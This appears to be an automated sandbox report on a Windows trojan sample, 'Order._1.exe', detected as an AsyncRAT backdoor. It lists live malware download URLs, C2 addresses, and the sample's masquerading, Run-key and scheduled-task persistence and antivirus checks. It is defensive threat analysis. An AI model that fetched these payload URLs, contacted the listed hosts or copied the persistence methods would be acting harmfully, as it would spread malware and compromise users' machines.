              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Users\user\AppData\Roaming\svchst.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Users\user\AppData\Roaming\svchst.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Users\user\AppData\Roaming\svchst.exe VolumeInformation
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_0040559A GetVersionExW,GetVersionExW,0_2_0040559A
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: Yara matchFile source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6310000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 8008, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 7348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 7480, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPED
              Source: C:\Users\user\AppData\Roaming\svchst.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.401bef0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.CoinAIfdp.exe.c70000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.1491080442.000000000401B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.1413986233.0000000000C72000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchst.exe, type: DROPPED
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.401bef0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.CoinAIfdp.exe.c70000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchst.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.401bef0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.CoinAIfdp.exe.c70000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.1491080442.000000000401B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.1413986233.0000000000C72000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchst.exe, type: DROPPED
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.401bef0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.CoinAIfdp.exe.c70000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchst.exe, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              1
              Scripting
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              OS Credential Dumping2
              File and Directory Discovery
              Remote Services11
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              1
              DLL Side-Loading
              12
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory14
              System Information Discovery
              Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Scheduled Task/Job
              2
              Scheduled Task/Job
              2
              Scheduled Task/Job
              111
              Obfuscated Files or Information
              Security Account Manager1
              Query Registry
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              2
              Software Packing
              NTDS211
              Security Software Discovery
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets2
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
              Virtualization/Sandbox Evasion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1484560 Sample: Order._1.exe Startdate: 30/07/2024 Architecture: WINDOWS Score: 100 57 secured-order-download-businessportal.replit.app 2->57 59 oshi.at 2->59 61 bg.microsoft.map.fastly.net 2->61 71 Multi AV Scanner detection for domain / URL 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 15 other signatures 2->77 10 Order._1.exe 8 2->10         started        13 svchst.exe 2 2->13         started        16 CoinAIfdp.exe 2->16         started        18 svchst.exe 2->18         started        signatures3 process4 dnsIp5 89 Detected unpacking (overwrites its own PE header) 10->89 20 cmd.exe 1 10->20         started        67 192.228.105.2, 49712, 7707 FIBERHUBUS United States 13->67 91 Antivirus detection for dropped file 13->91 93 Multi AV Scanner detection for dropped file 13->93 95 Machine Learning detection for dropped file 13->95 signatures6 process7 signatures8 79 Suspicious powershell command line found 20->79 23 CoinAIfdp.exe 16 10 20->23         started        28 powershell.exe 14 16 20->28         started        30 powershell.exe 16 20->30         started        32 conhost.exe 20->32         started        process9 dnsIp10 63 oshi.at 194.15.112.248, 443, 49706 INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB Ukraine 23->63 49 C:\Users\user\AppData\Roaming\svchst.exe, PE32 23->49 dropped 51 C:\Users\user\...\windowscachergslog.bin, data 23->51 dropped 53 WindowsCache1289fgbfbfgsdvdh=74937962458, data 23->53 dropped 81 Antivirus detection for dropped file 23->81 83 Multi AV Scanner detection for dropped file 23->83 85 Machine Learning detection for dropped file 23->85 34 cmd.exe 1 23->34         started        37 cmd.exe 1 23->37         started        65 secured-order-download-businessportal.replit.app 34.117.33.233, 443, 49704, 49705 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 28->65 87 Powershell drops PE file 28->87 55 C:\Users\user\AppData\Local\...\CoinAIfdp.exe, PE32 30->55 dropped file11 signatures12 process13 signatures14 69 Uses schtasks.exe or at.exe to add and modify task schedules 34->69 39 conhost.exe 34->39         started        41 schtasks.exe 1 34->41         started        43 conhost.exe 37->43         started        45 timeout.exe 1 37->45         started        47 svchst.exe 37->47         started        process15

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Order._1.exe67%VirustotalBrowse
              Order._1.exe63%ReversingLabsWin32.Backdoor.Asyncrat
              Order._1.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe100%AviraHEUR/AGEN.1353849
              C:\Users\user\AppData\Roaming\svchst.exe100%AviraHEUR/AGEN.1353849
              C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\svchst.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe71%ReversingLabsWin32.Backdoor.Asyncrat
              C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe59%VirustotalBrowse
              C:\Users\user\AppData\Roaming\svchst.exe71%ReversingLabsWin32.Backdoor.Asyncrat
              C:\Users\user\AppData\Roaming\svchst.exe59%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              bg.microsoft.map.fastly.net0%VirustotalBrowse
              oshi.at3%VirustotalBrowse
              secured-order-download-businessportal.replit.app1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://schemas.microsof0%URL Reputationsafe
              http://schemas.microsof0%URL Reputationsafe
              https://oshi.at/qNzy/OfCN.bin0%Avira URL Cloudsafe
              http://go.microsoft.cE0%Avira URL Cloudsafe
              https://oshi.at0%Avira URL Cloudsafe
              https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg0%Avira URL Cloudsafe
              https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe100%Avira URL Cloudmalware
              https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe5%VirustotalBrowse
              https://oshi.at/qNzy/OfCN.bin5%VirustotalBrowse
              https://oshi.at3%VirustotalBrowse
              https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.210.172
              truefalseunknown
              secured-order-download-businessportal.replit.app
              34.117.33.233
              truetrueunknown
              oshi.at
              194.15.112.248
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              https://oshi.at/qNzy/OfCN.binfalse
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://secured-order-download-businessportal.replit.app/CoinAIfdp.exetrue
              • 5%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              https://secured-order-download-businessportal.replit.app/purchaseOrder.jpgtrue
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://oshi.atCoinAIfdp.exe, 00000006.00000002.1489365816.0000000002FC6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 3%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://go.microsoft.cECoinAIfdp.exe, 00000010.00000002.1587574628.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCoinAIfdp.exe, 00000006.00000002.1489365816.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.microsofCoinAIfdp.exefalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              194.15.112.248
              oshi.atUkraine
              213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse
              34.117.33.233
              secured-order-download-businessportal.replit.appUnited States
              139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
              192.228.105.2
              unknownUnited States
              53340FIBERHUBUStrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1484560
              Start date and time:2024-07-30 11:10:11 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 22s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:22
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Order._1.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@26/18@2/3
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 87%
              • Number of executed functions: 520
              • Number of non-executed functions: 51
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 199.232.210.172, 2.19.126.137, 2.19.126.163
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              05:11:19API Interceptor52x Sleep call for process: powershell.exe modified
              05:11:26API Interceptor3x Sleep call for process: CoinAIfdp.exe modified
              05:11:36API Interceptor4x Sleep call for process: svchst.exe modified
              11:11:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CoinAi.exe C:\Users\user~1\AppData\Local\Temp\CoinAIfdp.exe
              11:11:36Task SchedulerRun new task: svchst path: "C:\Users\user\AppData\Roaming\svchst.exe"
              11:11:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CoinAi.exe C:\Users\user\AppData\Roaming\svchst.exe
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              194.15.112.248uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                  34.117.33.233http://login-vip.replit.app/vip/36c63962-0335-4720-9855-3e324d0acc58Get hashmaliciousUnknownBrowse
                  • login-vip.replit.app/vip/36c63962-0335-4720-9855-3e324d0acc58
                  192.228.105.2jdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    bg.microsoft.map.fastly.netPO-4ADB89.batGet hashmaliciousAgentTeslaBrowse
                    • 199.232.210.172
                    https://gb.trabajo.org/job-2895-139dda01f4a9a0ca5d08f2abad5cf8d6?utm_campaign=google_jobs_apply&utm_source=google_jobs_apply&utm_medium=organicGet hashmaliciousUnknownBrowse
                    • 199.232.214.172
                    https://securemail.lloydsbanking.com/b/f.e?r=andrew.riddle%40thefirstmile.co.uk&n=e87WHikad%2F3tT%2BmMu81Ocg%3D%3DGet hashmaliciousUnknownBrowse
                    • 199.232.214.172
                    https://play.google.com/store/apps/details?id=com.camujal.saludo2Get hashmaliciousUnknownBrowse
                    • 199.232.214.172
                    out_nbpvg.jsGet hashmaliciousMatanbuchusBrowse
                    • 199.232.214.172
                    https://cuentas-sura.com/loginGet hashmaliciousUnknownBrowse
                    • 199.232.210.172
                    4Y26u3rWN6.rtfGet hashmaliciousGuLoader, RemcosBrowse
                    • 199.232.214.172
                    TS-240730-ShellCode3.exeGet hashmaliciousUnknownBrowse
                    • 199.232.210.172
                    utP3GIDyRe.exeGet hashmaliciousLummaCBrowse
                    • 199.232.210.172
                    dloFT8nhgL.exeGet hashmaliciousLummaCBrowse
                    • 199.232.210.172
                    oshi.atjdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                    • 188.241.120.6
                    TamenuV11.msiGet hashmaliciousUnknownBrowse
                    • 5.253.86.15
                    Setup 3.0.0.msiGet hashmaliciousUnknownBrowse
                    • 188.241.120.6
                    SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousAkira StealerBrowse
                    • 188.241.120.6
                    SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousUnknownBrowse
                    • 188.241.120.6
                    uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                    • 194.15.112.248
                    W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                    • 194.15.112.248
                    9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                    • 5.253.86.15
                    9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                    • 5.253.86.15
                    PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                    • 5.253.86.15
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBuVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                    • 194.15.112.248
                    W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                    • 194.15.112.248
                    1pXdiCesZ6.exeGet hashmaliciousDanaBotBrowse
                    • 194.15.112.203
                    bad.pdf.exeGet hashmaliciousUnknownBrowse
                    • 194.15.113.200
                    FromRussiaWithLove.ps1Get hashmaliciousUnknownBrowse
                    • 194.15.112.70
                    x.exeGet hashmaliciousUnknownBrowse
                    • 194.15.113.210
                    b69SScPQRV.dllGet hashmaliciousBazaLoaderBrowse
                    • 194.15.113.155
                    Dsf8JqfE7v.dllGet hashmaliciousBazaLoaderBrowse
                    • 194.15.113.155
                    0x0005000000012636-65.exeGet hashmaliciousBazaLoaderBrowse
                    • 194.15.112.35
                    Invoice_#fdp..exeGet hashmaliciousBazaLoaderBrowse
                    • 194.15.112.35
                    GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttps://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                    • 34.117.77.79
                    SecuriteInfo.com.Trojan.Siggen29.7508.16428.4641.exeGet hashmaliciousUnknownBrowse
                    • 34.117.223.223
                    https://us-west-2.protection.sophos.com/?d=hihello.me&u=aHR0cHM6Ly9oaWhlbGxvLm1lL3AvN2I3OWEwYzAtYjI3Yi00MmU0LWE1YWEtODY0OGI1NTNiMGM5P3NoYXJlcl9pZD1Kak1TeUhmSHluVVh5a3MydFpuOG94VUdKbUcz&p=m&i=NjUwYzk1N2ZhMGU5OWEwYjY3ZDIxNzhi&t=WE1FYWNRK3hIVk5PckhQVURzVEhhT3RnY1Y5a2lpTldpOVR1VnRzYnVUcz0=&h=61e7083798104490909ca2b2d8af7b3c&s=AVNPUEhUT0NFTkNSWVBUSVYSSPnns3It4oylcIZtY22hc3gGaB3rJoPU9ItFzJAW9AGet hashmaliciousHTMLPhisherBrowse
                    • 34.117.163.232
                    setup.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 34.117.35.28
                    myprogram.exeGet hashmaliciousDiscord Token StealerBrowse
                    • 34.117.59.81
                    myprogram.exeGet hashmaliciousDiscord Token StealerBrowse
                    • 34.117.59.81
                    https://orr.swq.mybluehost.me/ch/f6014/Get hashmaliciousUnknownBrowse
                    • 34.117.239.71
                    https://orr.swq.mybluehost.me/ch/Get hashmaliciousUnknownBrowse
                    • 34.117.239.71
                    random.exeGet hashmaliciousUnknownBrowse
                    • 34.117.188.166
                    sand.exeGet hashmaliciousAmadey, StealcBrowse
                    • 34.117.188.166
                    FIBERHUBUSjdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                    • 192.228.105.2
                    http://shipit.mmthriftapps.com/login.aspxGet hashmaliciousUnknownBrowse
                    • 199.47.211.110
                    http://www.artisteer.com/?p=affr&redirect_url=https://tdg.site4clientdemo.com/vendor/bin/hereme/43432/6467r/biddept@lakeshorelearning.comGet hashmaliciousHTMLPhisherBrowse
                    • 199.241.142.75
                    94.156.8.9-skid.sh4-2024-07-23T17_40_06.elfGet hashmaliciousMirai, MoobotBrowse
                    • 204.77.80.0
                    http://www.artisteer.com/?p=affr&redirect_url=https%3A%2F%2Fjaherpe.es%2Fgo%2F9iX%2FaXJAa2dobS5jb20=&domain=kghm.comGet hashmaliciousHTMLPhisherBrowse
                    • 199.241.142.75
                    http://www.denhamgrove.com/Get hashmaliciousUnknownBrowse
                    • 104.225.129.134
                    VggY4E5Wt6.exeGet hashmaliciousRedLineBrowse
                    • 198.37.111.235
                    mpsl.elfGet hashmaliciousUnknownBrowse
                    • 204.77.80.6
                    jDSxdSv24i.elfGet hashmaliciousMiraiBrowse
                    • 206.191.205.92
                    AgreementCancellation-538065745-May30.pdf.7zGet hashmaliciousUnknownBrowse
                    • 104.225.129.169
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    3b5074b1b5d032e5620f69f9f700ff0ePRODUCTS LIST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 194.15.112.248
                    • 34.117.33.233
                    Your_New_Social_Security_Statement.wsfGet hashmaliciousXWormBrowse
                    • 194.15.112.248
                    • 34.117.33.233
                    TS-240730-ShellCode3.exeGet hashmaliciousUnknownBrowse
                    • 194.15.112.248
                    • 34.117.33.233
                    lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                    • 194.15.112.248
                    • 34.117.33.233
                    TS-240730-ShellCode3.exeGet hashmaliciousUnknownBrowse
                    • 194.15.112.248
                    • 34.117.33.233
                    https://www.variouscreativeformats.com/cbf68e50c507aa8717ac3d48bffe3c92/invoke.jsGet hashmaliciousUnknownBrowse
                    • 194.15.112.248
                    • 34.117.33.233
                    setup.exeGet hashmaliciousXWormBrowse
                    • 194.15.112.248
                    • 34.117.33.233
                    cheat_roblox.exeGet hashmaliciousXWormBrowse
